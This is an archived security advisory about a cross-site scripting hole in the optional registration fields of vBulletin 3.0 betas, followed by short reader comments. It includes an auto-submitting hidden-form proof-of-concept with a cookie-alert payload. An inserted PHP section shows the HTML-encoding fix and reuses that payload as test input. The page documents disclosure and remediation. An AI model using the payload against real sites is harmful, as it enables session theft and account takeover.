VBulletin New Member XSS Vulnerability

Tags: no_tag, 06.08.2003
------------------------------------------------------
VBulletin New Member XSS Vulnerability
------------------------------------------------------
Any kind of XSS attack is possible. With this vulnerability an attacker could access other users'/admins' accounts.

Online URL : http://ferruh.mavituna.com/article.asp?256

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application

Vendor & Demo; www.vbulletin.com

------------------------------------------------------
Description;
------------------------------------------------------
In the new member page (register.php), if you skip a required field the system redirects you to the same form and automatically refills the fields you entered before. In standard fields vBulletin successfully handles script injections, but not in optional fields like "Interests-Hobbies", "Biography", "Occupation" etc., so you can execute any JS with these fields.

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0 Beta 2 <> Beta 7

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 3.0 Gamma
vBulletin 2.3.0
vBulletin 2.2.8
...

------------------------------------------------------
Vendor Status and Patch;
------------------------------------------------------
26.01.2004, Problem fixed. Update to vB3 Gamma or later.

------------------------------------------------------
History
------------------------------------------------------
Discovered : 15.07.2003
Vendor Informed : 29.07.2003
Published : 06.08.2003

------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like other inputs is OK.
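The fix named under Solution, as an added example (not vBulletin's code and not part of the original advisory): a form-refill helper that echoes the submitted value raw, beside one that HTML-encodes it for the attribute context. The function names are hypothetical, the markup is reduced to the relevant attributes, and the sample value is constructed; `field1` is the field name used in the advisory's form.

```php
<?php
// Added example, not vBulletin code. Function names are hypothetical;
// "field1" is the optional profile field named in the advisory's form.

// Before: submitted value echoed straight into the value="" attribute.
function render_unsafe(string $name, string $submitted): string
{
    return '<input type="text" name="' . $name . '" value="' . $submitted . '" />';
}

// Encode for an HTML attribute: ENT_QUOTES converts both " and ', so the
// value can no longer terminate the attribute or the tag.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// After: same markup, every dynamic part encoded.
function render_safe(string $name, string $submitted): string
{
    return '<input type="text" name="' . attr($name) . '" value="' . attr($submitted) . '" />';
}

// True when the rendered markup is still a single tag, i.e. the value did
// not introduce markup of its own.
function is_single_tag(string $html): bool
{
    return substr_count($html, '<') === 1 && substr_count($html, '>') === 1;
}

// Constructed input: the value a re-displayed form would carry back.
$submitted = '"><script>alert(document.cookie)</script>';

foreach (['render_unsafe', 'render_safe'] as $fn) {
    $html = $fn('field1', $submitted);
    printf("%-13s single_tag=%s\n  %s\n", $fn, is_single_tag($html) ? 'yes' : 'NO', $html);
}

// Decoding the encoded value gives back the original text, so the user
// still sees what they typed when the form is refilled.
$roundtrip = html_entity_decode(attr($submitted), ENT_QUOTES, 'UTF-8') === $submitted;
printf("round-trip preserved: %s\n", $roundtrip ? 'yes' : 'NO');
```

The same encoding has to be applied to every refilled field, optional ones included; the bug described here came from encoding only the standard fields.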
------------------------------------------------------
Exploit Code;
------------------------------------------------------
[form action="http://[victim]/register.php?do=register" method="post" style="display:none"]
[input type="hidden" name="s" value="" /]
[input type="hidden" name="regtype" value="1" /]
[input type="text" class="bginput" name="field1" value="" size="25" maxlength="250" /]
[input type="hidden" name="url" value="index.php" /]
[input type="hidden" name="do" value="addmember" /]
[/form]
[script]
//Code that will be executed
var xss = "\"][script]alert(document"+".cookie)[\/script]";
document.forms[0].field1.value=xss;
document.forms[0].submit();
[/script]

*Replace ([],<>)

Ferruh Mavituna
http://ferruh.mavituna.com
Web Application Security Specialist

ErKan Cengiz - 14.07.2004

Ah, now I get it, I think it goes like this: we'll edit this code in a text editor

[form action="http://[victim]/register.php?do=register" method="post" style="display:none"]

the target site gets written where it says victim

and our text document will be saved as a web page, I guess, and then when it's opened, if the site has the hole, you get in, something like that, but I'm not completely sure, I'll try it sometime... you're a man whose hand deserves to be kissed, ferruh :) you've got gems in you, teach them to us too

ErKan Cengiz - 14.07.2004

Once again I didn't understand a thing, honestly

- 06.02.2004

thx a lot man for the info

:) - 19.12.2003

Come on, write these in Turkish, bro.
